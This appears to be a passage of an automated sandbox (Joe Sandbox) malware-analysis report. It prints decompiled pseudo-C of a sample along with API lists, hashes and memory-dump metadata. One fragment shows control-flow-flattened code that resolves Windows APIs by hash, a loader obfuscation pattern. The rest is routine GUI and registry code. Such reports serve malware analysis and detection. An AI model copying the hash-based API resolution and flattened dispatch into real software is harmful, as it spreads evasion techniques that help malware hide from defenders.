                                            										_v2876 = _t278;
                                            										__eflags = _t278;
                                            										if(_t278 == 0) {
                                            											goto L70;
                                            										} else {
                                            											_push(_t276);
                                            											_push(_t278);
                                            											_t196 = E02235BC0( *_t263,  *(_t263 + 4), _t278);
                                            											_t280 = _t280 + 8;
                                            											_v2896 = _t196;
                                            											__eflags = _t196;
                                            											if(_t196 == 0) {
                                            												goto L69;
                                            											} else {
                                            												_t241 = _v2892;
                                            												_t117 = 0x310afd51;
                                            												goto L2;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						} else {
                                            							if(__eflags == 0) {
                                            								_t139 =  *0x223dea8;
                                            								__eflags = _t139;
                                            								if(_t139 == 0) {
                                            									_t139 = E02233E80(_t191, E02233F20(0xbb398380), 0x97f883e, _t278);
                                            									 *0x223dea8 = _t139;
                                            								}
                                            								_t277 =  *_t139();
                                            								_t141 =  *0x223e1a0;
                                            								__eflags = _t141;
                                            								if(_t141 == 0) {
                                            									_t141 = E02233E80(_t191, E02233F20(0xbb398380), 0x26c3f343, _t278);
                                            									 *0x223e1a0 = _t141;
                                            								}
                                            								 *_t141(_t277, 0, _v2872);
                                            								_t196 = _v2908;
                                            								_t117 = 0x2be07bd7;
                                            								_t241 = _v2904;
                                            								goto L2;
                                            							} else {
                                            								__eflags = _t117 - 0x2a3fe145;
                                            								if(__eflags > 0) {
                                            									__eflags = _t117 - 0x2be07bd7;
                                            									if(_t117 != 0x2be07bd7) {
                                            										goto L28;
                                            									} else {
                                            										E02234250(_t191, _v2836);
                                            										_t196 = _v2896;
                                            										_t117 = 0x1a712fee;
                                            										_t241 = _v2892;
                                            										goto L2;
                                            									}
                                            								} else {
                                            									if(__eflags == 0) {
                                            										_t146 = E02232290( &_v2864,  &_v2844);
                                            										_t196 = _v2896;
                                            										_t241 = _v2892;
                                            										asm("sbb eax, eax");
                                            										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
                                            										goto L2;
                                            									} else {
                                            										__eflags = _t117 - 0x26613761;
                                            										if(_t117 == 0x26613761) {
                                            											E02231C70( &_v2688);
                                            											_t196 = _v2896;
                                            											_t117 = 0x3354cb2;
                                            											_t241 = _v2892;
                                            											goto L2;
                                            										} else {
                                            											__eflags = _t117 - 0x26c62088;
                                            											if(_t117 != 0x26c62088) {
                                            												goto L28;
                                            											} else {
                                            												_push( &_v2872);
                                            												_v2872 = 0;
                                            												_push( &_v2836);
                                            												_v2868 = 0;
                                            												_push( &_v2048);
                                            												_push( &_v2560);
                                            												_t154 = E02232C20( &_v2816, _v2848);
                                            												_t196 = _v2896;
                                            												_t280 = _t280 + 0x10;
                                            												_t241 = _v2892;
                                            												asm("sbb eax, eax");
                                            												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
                                            												goto L2;
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            						goto L71;
                                            						L28:
                                            						__eflags = _t117 - 0x33f32524;
                                            					} while (_t117 != 0x33f32524);
                                            					return _v2888;
                                            					goto L71;
                                            				}
                                            			}

                                            0x0223168e
                                            0x00000000
                                            0x02231619
                                            0x02231619
                                            0x0223161e
                                            0x00000000
                                            0x02231624
                                            0x0223162c
                                            0x02231631
                                            0x02231639
                                            0x02231641
                                            0x02231649
                                            0x02231651
                                            0x02231656
                                            0x0223165b
                                            0x0223165f
                                            0x02231662
                                            0x02231668
                                            0x0223166f
                                            0x00000000
                                            0x0223166f
                                            0x0223161e
                                            0x02231617
                                            0x0223160c
                                            0x02231606
                                            0x022315fb
                                            0x00000000
                                            0x022314ad
                                            0x022314ad
                                            0x022314ad
                                            0x022314c6
                                            0x00000000
                                            0x022314c6

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: E?*$a7a&$a7a&$Ei$Ei
                                            • API String ID: 0-288907479
                                            • Opcode ID: a90822e4b0b099060805fe5c384b008ef36b3c28567d5861b868bfc87914f056
                                            • Instruction ID: 75f249365da1273c7830dfa8a19f86c2169207a5f2f27f1327badec8b84f03a5
                                            • Opcode Fuzzy Hash: a90822e4b0b099060805fe5c384b008ef36b3c28567d5861b868bfc87914f056
                                            • Instruction Fuzzy Hash: 3BE1BEB16243028BC71ADFE4D890A6BB3E6BBC4744F04491DE48ADB348DB74ED15CB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 97%
                                            			E00415F1B(intOrPtr* __ecx) {
                                            				struct HWND__* _t45;
                                            				intOrPtr* _t54;
                                            				int _t63;
                                            				signed int _t66;
                                            				intOrPtr _t67;
                                            				intOrPtr* _t78;
                                            				struct tagMSG* _t80;
                                            				void* _t81;
                                            
                                            				_t67 = 1;
                                            				_t78 = __ecx;
                                            				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
                                            				 *(_t81 + 0x14) = 0;
                                            				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
                                            					L2:
                                            					 *((intOrPtr*)(_t81 + 0x10)) = 0;
                                            					L3:
                                            					_t45 = GetParent( *(_t78 + 0x1c));
                                            					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
                                            					 *(_t81 + 0x1c) = _t45;
                                            					_t80 = E004126FB() + 0x30;
                                            					L4:
                                            					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
                                            						while( *((intOrPtr*)( *((intOrPtr*)(E004126FB())) + 0x5c))() != 0) {
                                            							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
                                            								_t63 = _t80->message;
                                            								if(_t63 == 0x118 || _t63 == 0x104) {
                                            									E0041668C(_t78, 1);
                                            									UpdateWindow( *(_t78 + 0x1c));
                                            									 *((intOrPtr*)(_t81 + 0x10)) = 0;
                                            								}
                                            							}
                                            							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
                                            								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
                                            								return  *((intOrPtr*)(_t78 + 0x2c));
                                            							} else {
                                            								_t54 = E004126FB();
                                            								_push(_t80);
                                            								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
                                            									 *((intOrPtr*)(_t81 + 0x18)) = 1;
                                            									 *(_t81 + 0x14) = 0;
                                            								}
                                            								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
                                            									continue;
                                            								} else {
                                            									goto L4;
                                            								}
                                            							}
                                            						}
                                            						return E00429977(0) | 0xffffffff;
                                            					}
                                            					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
                                            						E0041668C(_t78, 1);
                                            						UpdateWindow( *(_t78 + 0x1c));
                                            						 *((intOrPtr*)(_t81 + 0x10)) = 0;
                                            					}
                                            					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
                                            						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
                                            					}
                                            					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
                                            						L14:
                                            						 *((intOrPtr*)(_t81 + 0x18)) = 0;
                                            						goto L4;
                                            					} else {
                                            						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
                                            						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
                                            							goto L4;
                                            						}
                                            						goto L14;
                                            					}
                                            				}
                                            				_t66 = E00416528(__ecx);
                                            				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
                                            				if((_t66 & 0x10000000) == 0) {
                                            					goto L3;
                                            				}
                                            				goto L2;
                                            			}












                                            APIs
                                            • GetParent.USER32(?), ref: 00415F4F
                                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 00415F78
                                            • UpdateWindow.USER32(?), ref: 00415F94
                                            • SendMessageA.USER32(?,00000121,00000000,?), ref: 00415FBA
                                            • SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 00415FD9
                                            • UpdateWindow.USER32(?), ref: 0041601C
                                            • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0041604F
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Message$Window$PeekSendUpdate$LongParent
                                            • String ID:
                                            • API String ID: 2853195852-0
                                            • Opcode ID: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
                                            • Instruction ID: a9d405acd130b45d961834bac1476ad35e2ab5294cb8f6c1009cd3559e17cf10
                                            • Opcode Fuzzy Hash: 9a012ef07eff98838d374f75436147ff2ba7ed0a7bc557100502bfdd7ab44939
                                            • Instruction Fuzzy Hash: 49418030604B41DBD720DF26C844E9BBFE4FFC5B54F140A1EF48186291D779D986CA9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004296EA(void* __ebx, int __ecx, void* __edi, intOrPtr _a4) {
                                            				struct HDC__* _t26;
                                            				struct tagSIZE* _t39;
                                            				int _t43;
                                            				long _t45;
                                            				struct tagSIZE* _t48;
                                            				int _t51;
                                            
                                            				_t41 = __ecx;
                                            				_t51 = __ecx;
                                            				if(_a4 != 0) {
                                            					_t39 = __ecx + 0x38;
                                            					GetViewportExtEx( *(__ecx + 8), _t39);
                                            					_t48 = __ecx + 0x30;
                                            					GetWindowExtEx( *(__ecx + 8), _t48);
                                            					if(_t48->cx > 0xffffc000) {
                                            						while(1) {
                                            							_t41 = _t48->cx;
                                            							if(_t41 >= 0x4000) {
                                            								goto L6;
                                            							}
                                            							_t45 = _t39->cx;
                                            							if(_t45 > 0xffffc000 && _t45 < 0x4000) {
                                            								_t41 = _t41 + _t41;
                                            								_t48->cx = _t41;
                                            								_t39->cx = _t45 + _t45;
                                            								if(_t41 > 0xffffc000) {
                                            									continue;
                                            								}
                                            							}
                                            							goto L6;
                                            						}
                                            					}
                                            					L6:
                                            					if( *(_t51 + 0x34) > 0xffffc000) {
                                            						while(1) {
                                            							_t41 =  *(_t51 + 0x34);
                                            							if(_t41 >= 0x4000) {
                                            								goto L11;
                                            							}
                                            							_t43 =  *(_t51 + 0x3c);
                                            							if(_t43 > 0xffffc000 && _t43 < 0x4000) {
                                            								_t41 = _t41 + _t41;
                                            								 *(_t51 + 0x34) = _t41;
                                            								 *(_t51 + 0x3c) = _t43 + _t43;
                                            								if(_t41 > 0xffffc000) {
                                            									continue;
                                            								}
                                            							}
                                            							goto L11;
                                            						}
                                            					}
                                            					L11:
                                            					_t39->cx = E00428907(_t41, _t39->cx,  *((intOrPtr*)(_t51 + 0x10)),  *0x439bf8,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x58));
                                            					 *(_t51 + 0x3c) = E00428907(_t41,  *(_t51 + 0x3c),  *((intOrPtr*)(_t51 + 0x10)),  *0x439bfc,  *((intOrPtr*)(_t51 + 0x14)), GetDeviceCaps( *(_t51 + 8), 0x5a));
                                            				}
                                            				_t26 =  *(_t51 + 4);
                                            				if(_t26 != 0) {
                                            					SetMapMode(_t26, 8);
                                            					SetWindowExtEx( *(_t51 + 4),  *(_t51 + 0x30),  *(_t51 + 0x34), 0);
                                            					SetViewportExtEx( *(_t51 + 4),  *(_t51 + 0x38),  *(_t51 + 0x3c), 0);
                                            					return E004297EF(_t51);
                                            				}
                                            				return _t26;
                                            			}










                                            APIs
                                            • GetViewportExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 00429701
                                            • GetWindowExtEx.GDI32(?,?,?,?,?,00429056,00000001), ref: 0042970E
                                            • GetDeviceCaps.GDI32(?,00000058), ref: 00429779
                                            • GetDeviceCaps.GDI32(?,0000005A), ref: 00429796
                                            • SetMapMode.GDI32(00000000,00000008), ref: 004297BC
                                            • SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 004297CD
                                            • SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 004297DE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CapsDeviceViewportWindow$Mode
                                            • String ID:
                                            • API String ID: 396987064-0
                                            • Opcode ID: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
                                            • Instruction ID: 029ae3144c04a12eb84a26ff9b3d66945ac525f496733399c5de6a1960b9f250
                                            • Opcode Fuzzy Hash: 3345bb5a9094e8666eaa33ece795193da96925dfc51a5fc8830be66225611f93
                                            • Instruction Fuzzy Hash: F2312871200A11EFDB715F25EE80B2BBBB6FF94700B90982DE28691A60D775A8519B08
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
                                            • GetMessageA.USER32 ref: 0041FF9B
                                            • DispatchMessageA.USER32 ref: 0041FFAE
                                            • SetRectEmpty.USER32(?), ref: 0041FFD7
                                            • GetDesktopWindow.USER32 ref: 0041FFEF
                                            • LockWindowUpdate.USER32(?,00000000,?,00000000,0000000F,0000000F,00000000), ref: 00420000
                                            • GetDCEx.USER32(?,00000000,00000003,?,00000000,0000000F,0000000F,00000000), ref: 00420017
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                            • String ID:
                                            • API String ID: 1192691108-0
                                            • Opcode ID: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
                                            • Instruction ID: 7b4feb9468581440af327a22176e3db1bbe8d75c7627dd3e4d63dbf17c191cc2
                                            • Opcode Fuzzy Hash: 788c472facf28495b2051c77c94d9c198475e2b8af682ce7500eb59dc763f021
                                            • Instruction Fuzzy Hash: 6B2162B1600709AFD7209F65EC84E67BBECFB08384B44483EF545C6151D735F8469B64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E004152C7(struct HDWP__** _a4, struct HWND__* _a8, RECT* _a12) {
                                            				struct tagRECT _v20;
                                            				int _t15;
                                            				int _t23;
                                            				struct HDWP__* _t25;
                                            				struct HWND__* _t26;
                                            				int _t27;
                                            				long _t28;
                                            				struct HDWP__** _t35;
                                            				RECT* _t37;
                                            
                                            				_t26 = _a8;
                                            				_t15 = GetParent(_t26);
                                            				_t35 = _a4;
                                            				_a8 = _t15;
                                            				if(_t35 == 0 ||  *_t35 != 0) {
                                            					GetWindowRect(_t26,  &_v20);
                                            					ScreenToClient(_a8,  &_v20);
                                            					ScreenToClient(_a8,  &(_v20.right));
                                            					_t37 = _a12;
                                            					_t15 = EqualRect( &_v20, _t37);
                                            					if(_t15 == 0) {
                                            						_t23 = _t37->top;
                                            						_t27 = _t37->left;
                                            						_t28 = _t37->bottom;
                                            						_push(0x14);
                                            						if(_t35 == 0) {
                                            							return SetWindowPos(_t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
                                            						}
                                            						_t25 = DeferWindowPos( *_t35, _t26, 0, _t27, _t23, _t37->right - _t27, _t28 - _t23, ??);
                                            						 *_t35 = _t25;
                                            						return _t25;
                                            					}
                                            				}
                                            				return _t15;
                                            			}













                                            APIs
                                            • GetParent.USER32(?), ref: 004152D4
                                            • GetWindowRect.USER32 ref: 004152EE
                                            • ScreenToClient.USER32 ref: 00415301
                                            • ScreenToClient.USER32 ref: 0041530A
                                            • EqualRect.USER32 ref: 00415314
                                            • DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000014), ref: 0041533C
                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?,00000000,00000000,?), ref: 00415354
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$ClientRectScreen$DeferEqualParent
                                            • String ID:
                                            • API String ID: 443303494-0
                                            • Opcode ID: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
                                            • Instruction ID: 07014e229ed6a7b25482b6998f11fd7e237ae46f5a3226271598de642c651d74
                                            • Opcode Fuzzy Hash: 6a085f23455b506641fb664c9f872d6e0eb60696c2830eab613455ce1ebaad90
                                            • Instruction Fuzzy Hash: FB117F76600609FFE7109F68CC88EBBBBBDEB88710F108529B91593215E774AD418BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00425DE9(intOrPtr __ecx) {
                                            				void* _v8;
                                            				void* _v12;
                                            				void* _v16;
                                            				int _v20;
                                            				intOrPtr _v24;
                                            				intOrPtr _t32;
                                            
                                            				_t32 = __ecx;
                                            				_v24 = __ecx;
                                            				_v16 = 0;
                                            				_v8 = 0;
                                            				_v12 = 0;
                                            				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                            					RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                            				}
                                            				if(_v8 != 0) {
                                            					RegCloseKey(_v8);
                                            				}
                                            				if(_v12 != 0) {
                                            					RegCloseKey(_v12);
                                            				}
                                            				return _v16;
                                            			}










                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00425E17
                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E3A
                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00425E59
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E69
                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00425E73
                                            Similarity
                                            • API ID: CloseCreate$Open
                                            • String ID: software
                                            • API String ID: 1740278721-2010147023
                                            • Opcode ID: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
                                            • Instruction ID: 0af0f3997741b28716963c04c81515c15655377052ffcc376828dcfe476aa2da
                                            • Opcode Fuzzy Hash: ef35ffc1de14d179d2ad0911c310037a7393524ecf252a7ab65d51927ebb2645
                                            • Instruction Fuzzy Hash: 0311F872A00528FBCB21CB96DC84DEFFFBCEF89744F5000AAA515A2121D3705A01DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 56%
                                            			E00404F6B(intOrPtr _a4, intOrPtr* _a8) {
                                            				void _v20;
                                            				int _t18;
                                            				intOrPtr* _t22;
                                            				intOrPtr _t30;
                                            
                                            				if(E00404DD2() == 0) {
                                            					if(_a4 != 0x12340042) {
                                            						L9:
                                            						return 0;
                                            					}
                                            					_t22 = _a8;
                                            					if(_t22 == 0 ||  *_t22 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
                                            						goto L9;
                                            					} else {
                                            						 *((intOrPtr*)(_t22 + 4)) = 0;
                                            						 *((intOrPtr*)(_t22 + 8)) = 0;
                                            						 *((intOrPtr*)(_t22 + 0xc)) = GetSystemMetrics(0);
                                            						_t18 = GetSystemMetrics(1);
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						asm("movsd");
                                            						_t30 = 1;
                                            						 *(_t22 + 0x10) = _t18;
                                            						 *((intOrPtr*)(_t22 + 0x24)) = _t30;
                                            						if( *_t22 >= 0x48) {
                                            							lstrcpyA(_t22 + 0x28, "DISPLAY");
                                            						}
                                            						return _t30;
                                            					}
                                            				}
                                            				return  *0x439618(_a4, _a8);
                                            			}








                                            APIs
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00404FA9
                                            • GetSystemMetrics.USER32 ref: 00404FC1
                                            • GetSystemMetrics.USER32 ref: 00404FC8
                                            • lstrcpyA.KERNEL32(?,DISPLAY), ref: 00404FEC
                                            Similarity
                                            • API ID: System$Metrics$InfoParameterslstrcpy
                                            • String ID: B$DISPLAY
                                            • API String ID: 1409579217-3316187204
                                            • Opcode ID: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
                                            • Instruction ID: 0269e9ff9c82b1da89f60d18f206ef68f762114564e5db41c1733f16ce370355
                                            • Opcode Fuzzy Hash: fc4978af5ac8f74fb81d04261746e33f8207f39954ecdab6ad15e40bdb5edc53
                                            • Instruction Fuzzy Hash: 0411C6B1600326ABDB119F649C8469BBFA8EF45750B508073FE05AE182D7B9D941CBF8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0040381D(intOrPtr _a4) {
                                            				long _v8;
                                            				long _v12;
                                            				struct tagMSG _v40;
                                            
                                            				if(_a4 != 0) {
                                            					_v8 = GetTickCount();
                                            					while(1 != 0) {
                                            						_v12 = GetTickCount();
                                            						if(_v12 < _v8 || _v12 - _v8 > _a4) {
                                            							break;
                                            						} else {
                                            							if(PeekMessageA( &_v40, 0, 0, 0, 0) == 0) {
                                            								Sleep(1);
                                            							} else {
                                            								GetMessageA( &_v40, 0, 0, 0);
                                            								TranslateMessage( &_v40);
                                            								DispatchMessageA( &_v40);
                                            							}
                                            							continue;
                                            						}
                                            					}
                                            					return 1;
                                            				}
                                            				return 1;
                                            			}







                                            Similarity
                                            • API ID: CountTick
                                            • String ID:
                                            • API String ID: 536389180-0
                                            • Opcode ID: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
                                            • Instruction ID: 9bbdf3f7d950dda3c106a7053e01199b699c7596eca1dee1c5b4b451079f442e
                                            • Opcode Fuzzy Hash: 62664b2ccced0f01c7f848e18cfdb5bd16bdfa6a3194e22d98a032b2161cbf00
                                            • Instruction Fuzzy Hash: 6D11F431A00208EBEB10EFA0D949B9D7BF8AB04705F6081A5F905B61C0D775AB469B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00417178(void* __ecx) {
                                            				struct HBRUSH__* _t14;
                                            				void* _t18;
                                            
                                            				_t18 = __ecx;
                                            				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                            				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                            				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                            				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                            				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                            				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                            				_t14 = GetSysColorBrush(6);
                                            				 *(_t18 + 0x20) = _t14;
                                            				return _t14;
                                            			}






                                            APIs
                                            • GetSysColor.USER32(0000000F), ref: 00417184
                                            • GetSysColor.USER32(00000010), ref: 0041718B
                                            • GetSysColor.USER32(00000014), ref: 00417192
                                            • GetSysColor.USER32(00000012), ref: 00417199
                                            • GetSysColor.USER32(00000006), ref: 004171A0
                                            • GetSysColorBrush.USER32(0000000F), ref: 004171AD
                                            • GetSysColorBrush.USER32(00000006), ref: 004171B4
                                            Similarity
                                            • API ID: Color$Brush
                                            • String ID:
                                            • API String ID: 2798902688-0
                                            • Opcode ID: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
                                            • Instruction ID: 88891574432b8891f472ad4648ce297f27c70735abb480ab9afea6e1339babde
                                            • Opcode Fuzzy Hash: 80a27b1f02e3c58edf4c19fbc6f0daf7df48ddc1e8fb47ec45f2cb1cd70874ec
                                            • Instruction Fuzzy Hash: 3AF01C71A407489BD730BF729D49B47BBE0FFC4B10F42092EE2858BA91E6B5A401DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042047F() {
                                            				long _t5;
                                            				int _t6;
                                            
                                            				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                            					_t5 = GetVersion();
                                            					if((0x80000000 & _t5) != 0) {
                                            						L6:
                                            						 *0x439628 =  *0x439628 & 0x00000000;
                                            						return _t5;
                                            					}
                                            					_t5 = GetVersion();
                                            					if(_t5 != 3) {
                                            						goto L6;
                                            					}
                                            					goto L5;
                                            				} else {
                                            					L5:
                                            					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
                                            					 *0x439628 = _t6;
                                            					return _t6;
                                            				}
                                            			}






                                            Similarity
                                            • API ID: Version$MessageRegisterWindow
                                            • String ID: MSWHEEL_ROLLMSG
                                            • API String ID: 303823969-2485103130
                                            • Opcode ID: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
                                            • Instruction ID: 25fbbff43e00deea4677d8a477c73a5b9be4ee826b54bccf5d226778cb27c547
                                            • Opcode Fuzzy Hash: 26758afab022c1db6d696d894fb3c80caf3662092470fbb9c82adf2f042b39ed
                                            • Instruction Fuzzy Hash: DFE0803EF0123646D72137647C0436E66D49F88360FE5D17BDB41423555A7C484346BE
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 91%
                                            			E00426D87(void* __ecx) {
                                            				struct HDC__* _t87;
                                            				intOrPtr* _t88;
                                            				struct HDC__* _t97;
                                            				intOrPtr _t98;
                                            				int _t100;
                                            				struct HDC__* _t110;
                                            				int _t122;
                                            				intOrPtr* _t126;
                                            				void* _t136;
                                            				intOrPtr* _t137;
                                            				struct HDC__** _t138;
                                            				int _t153;
                                            				intOrPtr _t157;
                                            				signed short _t171;
                                            				int _t175;
                                            				void* _t178;
                                            				void* _t180;
                                            
                                            				E00406520(E0042A133, _t180);
                                            				_t178 = __ecx;
                                            				 *(__ecx + 0x70) =  *(_t180 + 8);
                                            				_t87 = E004131DD(0x3c);
                                            				 *(_t180 + 8) = _t87;
                                            				 *(_t180 - 4) =  *(_t180 - 4) & 0x00000000;
                                            				if(_t87 == 0) {
                                            					_t88 = 0;
                                            					__eflags = 0;
                                            				} else {
                                            					_t88 = E00428824(_t87);
                                            				}
                                            				 *((intOrPtr*)(_t178 + 0x114)) = _t88;
                                            				 *(_t180 - 4) =  *(_t180 - 4) | 0xffffffff;
                                            				 *((intOrPtr*)( *_t88 + 0x3c)) = 0x7009;
                                            				_t175 = 1;
                                            				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x14) | 0x00000040;
                                            				 *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t178 + 0x114)))) + 0x5c)) + 0x15) & 0x000000fe;
